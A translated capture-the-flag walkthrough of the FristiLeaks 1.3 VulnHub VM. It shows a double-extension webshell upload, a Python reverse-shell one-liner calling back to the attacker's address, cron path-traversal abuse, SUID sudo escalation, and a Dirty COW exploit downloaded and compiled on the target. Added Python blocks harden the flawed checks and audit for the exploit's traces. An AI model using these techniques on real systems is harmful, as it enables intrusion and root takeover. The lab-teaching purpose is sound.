【攻略鸭】FristiLeaks 1.3 VulnHub Walkthrough

This article is purely fictional; please follow and like 攻略鸭 on Bilibili for support!
Attacker machine address: 192.168.31.196
Following the VM description, set the MAC address to 08:00:27:A5:A6:76; after booting, the target comes up at 192.168.31.123
(To set a VM's MAC address: VM Settings -> Network Adapter -> Advanced -> MAC Address)
External reconnaissance
Port scan
Nmap results:
80/tcp open Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
robots.txt: /cola /sisi /beer
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
Port 80
Nothing sensitive in the page source.
Opening the three directories from robots.txt, each page source contains only the image path /images/3037440.jpg.
Directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.123/FUZZ
Nothing found.
Exploitation
Information leak via a hidden image
From other people's writeups I learned that /fristi/ has a login form.
The HTML comments in the page source reveal the username eezeepz and a base64-encoded image:
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
Decoding the base64 blob gives a PNG image that shows the string keKkeKKeKKeKkEkkEk.
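The recovery step above can be scripted so that every base64 blob hidden in an HTML comment is pulled out and written to disk. The following is an added example, not code from the original writeup: it scans comments, strips the line wrapping, validates the base64 and keeps only blobs whose decoded bytes carry a known image signature. SAMPLE_HTML is constructed for the demo (a PNG signature plus filler); point extract_images at the fetched /fristi/ page in practice.

```python
# Added example (not from the original writeup): recover images that were
# hidden as base64 inside HTML comments, as with the eezeepz hint on /fristi/.
# SAMPLE_HTML below is constructed for the demo; it is not the target's page.
import base64
import binascii
import re

# Magic bytes of the image types worth recovering.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def extract_images(html):
    """Return [(kind, raw_bytes)] for every HTML comment whose body, once the
    line wrapping is stripped, is valid base64 for a known image format."""
    found = []
    for comment in COMMENT_RE.findall(html):
        blob = "".join(comment.split())   # undo the ~76-column wrapping
        if not blob or not B64_RE.match(blob):
            continue
        try:
            data = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        for magic, kind in MAGIC.items():
            if data.startswith(magic):
                found.append((kind, data))
                break
    return found


def save_images(html, prefix="hidden"):
    """Write each recovered image to <prefix>_<n>.<kind>; return the names."""
    names = []
    for i, (kind, data) in enumerate(extract_images(html)):
        name = f"{prefix}_{i}.{kind}"
        with open(name, "wb") as fh:
            fh.write(data)
        names.append(name)
    return names


# Constructed sample: a PNG signature plus filler, base64-encoded and wrapped
# inside a comment, next to an ordinary text comment that must be ignored.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24
_enc = base64.b64encode(FAKE_PNG).decode()
SAMPLE_HTML = (
    "<html><body>\n<!-- TODO: remove the hint below -->\n"
    "<!--\n" + _enc[:20] + "\n" + _enc[20:] + "\n-->\n</body></html>"
)

if __name__ == "__main__":
    for name in save_images(SAMPLE_HTML):
        print("wrote", name)
```

The password in the real hint is rendered as pixels, so after saving the PNG you still have to open it and read the text; nothing in the decoded bytes contains the string itself.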
Testing the login form:
http://192.168.31.123/fristi/checklogin.php
POST /fristi/checklogin.php HTTP/1.1
myusername=test1&mypassword=test2&Submit=Login
Response:
Wrong Username or Password
No lockout or other failed-login handling was observed, but the error message does not distinguish a bad username from a bad password, so the attempt at account enumeration failed.
Logging in as eezeepz with the password keKkeKKeKKeKkEkkEk succeeds, and the authenticated page offers an image upload feature.
File upload
Uploading an ordinary image, white-wolf-wizard.jpg, returns a message saying the file was saved under /uploads.
Requesting http://192.168.31.123/fristi/uploads/ (the directory listing) just returns "no".
The uploaded file itself can be requested directly as /fristi/uploads/white-wolf-wizard.jpg.
Uploading a Behinder (冰蝎) webshell is rejected: only png, jpg and gif are allowed.
The server software is known from the scan (Apache 2.2.15 with PHP 5.3.3 on CentOS), so a double extension is the obvious bypass: upload the shell as shell.php.jpg, and requesting http://192.168.31.123/fristi/uploads/shell.php.jpg executes it. The upload filter only checks for an image suffix, while Apache's AddHandler mapping matches .php in any position of a multi-extension filename, so the file is still handed to mod_php.
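To make the double-extension bypass concrete, here is an added example (my own code, not the target's upload script, whose source is not shown on this page). It emulates mod_mime's rule that any dot-separated segment can select a handler, puts a weak "image suffix anywhere" filter next to a strict "exactly one extension, from an allowlist" filter, and shows which uploads would still be executed as PHP. The assumption that the handler is mapped with AddHandler ... .php is stated in the code.

```python
# Added example (not from the original writeup): why shell.php.jpg runs as PHP.
# mod_mime treats every dot-separated segment after the first as an extension,
# so a handler mapped to .php (assumed here: AddHandler php5-script .php, the
# CentOS 6 default) fires on shell.php.jpg. The two check functions are my
# reconstruction for the demo, not the target's code.
import os
import re

IMAGE_EXTS = {"png", "jpg", "gif"}
HANDLER_EXTS = {"php"}   # assumed handler mapping on the target


def apache_handler_fires(filename):
    """Emulate mod_mime: any extension segment in the name may select a handler."""
    segments = filename.split(".")[1:]          # 'shell.php.jpg' -> ['php', 'jpg']
    return any(seg.lower() in HANDLER_EXTS for seg in segments)


def weak_upload_check(filename):
    """Weak filter: accept if an allowed image extension appears anywhere."""
    return any(f".{ext}" in filename.lower() for ext in IMAGE_EXTS)


def strict_upload_check(filename):
    """Hardened filter: bare basename, exactly one extension, allowlisted
    extension, and a stem restricted to a safe character set."""
    base = os.path.basename(filename)
    if base != filename or base.count(".") != 1:
        return False
    stem, ext = base.rsplit(".", 1)
    return bool(re.fullmatch(r"[A-Za-z0-9_-]+", stem)) and ext.lower() in IMAGE_EXTS


def would_execute(filename, check):
    """True if the upload passes `check` AND Apache would hand it to mod_php."""
    return check(filename) and apache_handler_fires(filename)


if __name__ == "__main__":
    for name in ["white-wolf-wizard.jpg", "shell.php", "shell.php.jpg"]:
        print(f"{name:24} weak:{would_execute(name, weak_upload_check)}  "
              f"strict:{would_execute(name, strict_upload_check)}")
```

A filename check alone is still only one layer: the upload directory should also have script execution disabled (or sit outside the document root), so that a filter slip does not turn into code execution.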
>id
uid=48(apache) gid=48(apache) groups=48(apache)
On the attacker machine listen with nc -nvlp 443, then run the reverse shell through Behinder's command execution:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.196",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The shell connects back.
python -c 'import pty;pty.spawn("/bin/bash")'
echo $-   (prints the shell flags; an i in the output confirms the upgraded shell is interactive)
Privilege escalation
Information gathering as the apache user
cat /etc/passwd
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin
OS: Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org)
(gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015
gcc.x86_64 4.4.7-16.el6
Check scheduled tasks:
ls -al /etc/cron*
/etc/cron.d/0hourly:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
01 * * * * root run-parts /etc/cron.hourly
/etc/cron.hourly/0anacron:
cat /etc/cron.hourly/0anacron
#!/bin/bash
# Skip excecution unless the date has changed from the previous run
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi
# Skip excecution unless AC powered
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power &> /dev/null
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
ls -al /usr/sbin/anacron
-rwxr-xr-x. 1 root root 38968 Nov 10 2015 /usr/sbin/anacron
/var/spool/anacron:
-rw-------. 1 root root 9 Dec 5 05:22 cron.daily
-rw-------. 1 root root 9 Dec 5 06:02 cron.monthly
-rw-------. 1 root root 9 Dec 5 05:42 cron.weekly
Nothing useful: the anacron timestamp files are root-only.
ls -al /var/spool/cron
-rw------- 1 admin admin 49 Nov 18 2015 admin
Permission denied: the admin crontab is readable only by admin (and root).
Sudo version 1.8.6p3
SELinux status:disabled
mysql Ver 14.14 Distrib 5.1.73
Database credentials:
cat /var/www/html/fristi/checklogin.php
$host="localhost"
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name
mysql -h localhost -u eezeepz -p 4ll3maal12
Login failed. Note that this command is wrong in any case: with a space after -p, mysql takes 4ll3maal12 as the database name and prompts for the password, and the real password contains a '#', which an unquoted shell argument would treat as a comment. The correct form is mysql -h localhost -u eezeepz -p'4ll3maal12#' hackmenow.
Check mail:
ls -al /var/mail/
ls -al /var/spool/mail/
Permission denied, and every mailbox is 0 bytes anyway.
cat /var/www/notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
/home/eezeepz:
ls -al
...
-r--r--r--. 1 eezeepz eezeepz 514 Nov 18 2015 notes.txt
...
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
\- Jerry
So a file named runthis in /tmp/ is executed line by line as the admin user, once a minute.
Privilege escalation via the admin cron job and a SUID binary
Attempts:
echo "chmod -R 777 /home/admin" >/tmp/runthis  - not executed
echo "/bin/chmod -R 477 /home/admin" >/tmp/runthis  - not executed
The output in /tmp/cronresult reads: command did not start with /home/admin or /usr/bin
echo "/usr/bin/../../bin/chmod -R 777 /home/admin" >/tmp/runthis  - executed
(There is no chmod under /usr/bin/, so the command reaches /bin/chmod by traversing out of /usr/bin/ with ../..; the cron job only does a string-prefix comparison on the path and never normalises it.)
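The root cause is the prefix test itself. The block below is an added example, not the target's cronjob.py (which the page does not reproduce): naive_allowed reconstructs the "must start with /home/admin or /usr/bin" behaviour that the error message implies, and hardened_allowed shows what the check should have done, namely normalise the executable path before comparing it and additionally require the basename to be on an allowlist. The allowlist of binaries is assumed from Jerry's note; RUNTHIS is constructed from the three attempts above plus one legitimate line.

```python
# Added example (not from the original writeup): the admin cron job rejects
# lines that do not start with /home/admin or /usr/bin, and the writeup bypasses
# it with /usr/bin/../../bin/chmod. naive_allowed is my reconstruction of that
# check; hardened_allowed is the corrected version. ALLOWED_BINS is assumed
# from the note in /home/eezeepz/notes.txt.
import os
import shlex

ALLOWED_DIRS = ("/home/admin", "/usr/bin")
ALLOWED_BINS = {"chmod", "df", "cat", "echo", "ps", "grep", "egrep"}


def naive_allowed(line):
    """String-prefix test only: any path that *starts with* an allowed
    directory passes, including ones that traverse out of it with '..'."""
    return line.startswith(ALLOWED_DIRS)


def hardened_allowed(line):
    """Normalise the executable path before checking the directory, and
    additionally require the basename to be on a fixed allowlist."""
    try:
        argv = shlex.split(line)
    except ValueError:
        return False
    if not argv:
        return False
    exe = os.path.normpath(argv[0])          # collapses '..' and '//' lexically
    if not os.path.isabs(exe):
        return False
    in_allowed_dir = any(
        os.path.commonpath([exe, d]) == d for d in ALLOWED_DIRS
    )
    return in_allowed_dir and os.path.basename(exe) in ALLOWED_BINS


def filter_runthis(text, check):
    """Apply `check` to each non-empty line of a runthis file and return the
    lines that would be executed."""
    return [ln.strip() for ln in text.splitlines() if ln.strip() and check(ln.strip())]


# Constructed runthis content: the three attempts from the writeup plus a
# legitimate use of one of the copied binaries.
RUNTHIS = """\
chmod -R 777 /home/admin
/bin/chmod -R 477 /home/admin
/usr/bin/../../bin/chmod -R 777 /home/admin
/home/admin/cat /home/admin/cryptedpass.txt
"""

if __name__ == "__main__":
    print("naive   :", filter_runthis(RUNTHIS, naive_allowed))
    print("hardened:", filter_runthis(RUNTHIS, hardened_allowed))
```

normpath is purely lexical, so a symlink planted inside an allowed directory would still escape it; a production version should resolve with os.path.realpath, execute argv directly (no shell), and keep the basename allowlist, since a prefix of /usr/bin on its own would still admit interpreters such as /usr/bin/python.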
Find the files owned by admin:
find / -user admin 2>/dev/null
/home/admin
/home/admin/df
/home/admin/cat
/home/admin/chmod
/home/admin/cryptedpass.txt
/home/admin/.bash_logout
/home/admin/.bashrc
/home/admin/echo
/home/admin/egrep
/home/admin/ps
/home/admin/cryptpass.py
/home/admin/.bash_profile
/home/admin/grep
/home/admin/cronjob.py
/var/spool/mail/admin
/tmp/cronresult
cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
cryptpass.py
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
The encoding is: base64-encode, reverse the string, then rot13. Decoding applies the inverse steps in reverse order; rot13 is its own inverse and works per character, so it can be applied before or after undoing the reversal.
Rewritten as a decoding script, decryptpass.py (Python 3):
import base64, codecs

def decodeString(s):
    # rot13 undoes itself; reverse the string back, then base64-decode.
    rot13string = codecs.encode(s[::-1], 'rot13')
    return base64.b64decode(rot13string)

cryptedpass = 'mVGZ3O3omkJLmy2pcuTq'
whoisyourgodnow = '=RFn0AKnlMHMPIzpyuTI0ITG'
print("cryptedpass:", decodeString(cryptedpass).decode('utf-8'))
print("whoisyourgodnow:", decodeString(whoisyourgodnow).decode('utf-8'))
$ python3 decryptpass.py
cryptedpass: thisisalsopw123
whoisyourgodnow: LetThereBeFristi!
su fristigod
Password: LetThereBeFristi!
From /etc/passwd, fristigod's home directory is /var/fristigod (fristigod:x:502:502::/var/fristigod:/bin/bash):
cd /var/fristigod
ls -al
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
The history shows fristigod repeatedly running /var/fristigod/.secret_admin_stuff/doCom as the user fristi via sudo and passing it commands (e.g. ls /). Check the binary itself:
cd .secret_admin_stuff
ls -al
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
doCom is SUID root and executes the command given as its argument, and the sudo rule lets fristigod run it as fristi, so the argument ends up running with euid 0:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
[sudo] password for fristigod: LetThereBeFristi!
# id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
Kernel exploit (Dirty COW, CVE-2016-5195)
Attacker machine:
$ cp /usr/share/exploitdb/exploits/linux/local/40839.c .
$ python -m http.server 8080
Target:
cd /tmp
wget 192.168.31.196:8080/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 123456qaz
Result:
firefart:fire86WDPZnrM:0:0:pwned:/root:/bin/bash
mmap: 7ff3e25bd000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456qaz'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
$ su firefart
Password: 123456qaz
# id
uid=0(firefart) gid=0(root) groups=0(root)
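The 40839.c PoC rewrites /etc/passwd to add a uid-0 account with its password hash stored inline, which is exactly the artefact a responder should look for afterwards (and which the exploit's own reminder to restore /tmp/passwd.bak is about). The block below is an added example of that check, not part of the original writeup: it parses passwd-format text, flags uid-0 accounts other than root, hash values that should live in /etc/shadow, and malformed lines. SAMPLE is constructed from the target's entries plus the injected firefart line.

```python
# Added example (not from the original writeup): an incident-response check
# for what the Dirty COW PoC (exploit-db 40839, CVE-2016-5195) leaves behind.
# It adds a uid-0 user ('firefart') to /etc/passwd with the hash stored inline
# and keeps a backup at /tmp/passwd.bak. SAMPLE is constructed from the
# target's entries plus the injected line.
import re

PASSWD_LINE = re.compile(r"^([^:]+):([^:]*):(\d+):(\d+):([^:]*):([^:]*):([^:]*)$")
SHADOW_MARKERS = {"x", "*", "!", "!!", ""}   # values that mean "no hash here"


def parse_passwd(text):
    """Parse passwd-format text. Returns (entries, malformed); malformed lines
    are kept separately because a corrupted file is itself a finding."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = PASSWD_LINE.match(line)
        if not m:
            malformed.append((lineno, line))
            continue
        name, pw, uid, gid, gecos, home, shell = m.groups()
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries, malformed


def rogue_root_accounts(text):
    """Names of uid-0 accounts other than root."""
    entries, _ = parse_passwd(text)
    return [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"]


def audit_passwd(text):
    """Return a list of (severity, message) findings, in file order."""
    entries, malformed = parse_passwd(text)
    findings = [("high", f"line {n}: malformed entry {line!r}") for n, line in malformed]
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("critical",
                             f"extra uid-0 account {e['name']!r} "
                             f"(home {e['home']}, shell {e['shell']})"))
        if e["pw"] not in SHADOW_MARKERS:
            findings.append(("high", f"password hash stored in passwd for {e['name']!r}"))
    return findings


SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
firefart:fire86WDPZnrM:0:0:pwned:/root:/bin/bash
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin
"""

if __name__ == "__main__":
    for severity, msg in audit_passwd(SAMPLE):
        print(f"[{severity}] {msg}")
```

Run it against the live file with audit_passwd(open("/etc/passwd").read()); on the target it should report nothing once /tmp/passwd.bak has been moved back, and the exploit is also a race that can leave the kernel unstable, so restore and reboot the VM when done.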
Other
cat /var/spool/cron/admin
* * * * * /usr/bin/python /home/admin/cronjob.py
cat /etc/sudoers
fristigod ALL=(fristi:ALL) /var/fristigod/.secret_admin_stuff/doCom
# cat /root/fristileaks_secrets.txt
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
I never guessed the fristi directory; I could not translate the word at the time, and later found out it is the name of a drink.
Reproduction of this article without the author's permission is prohibited!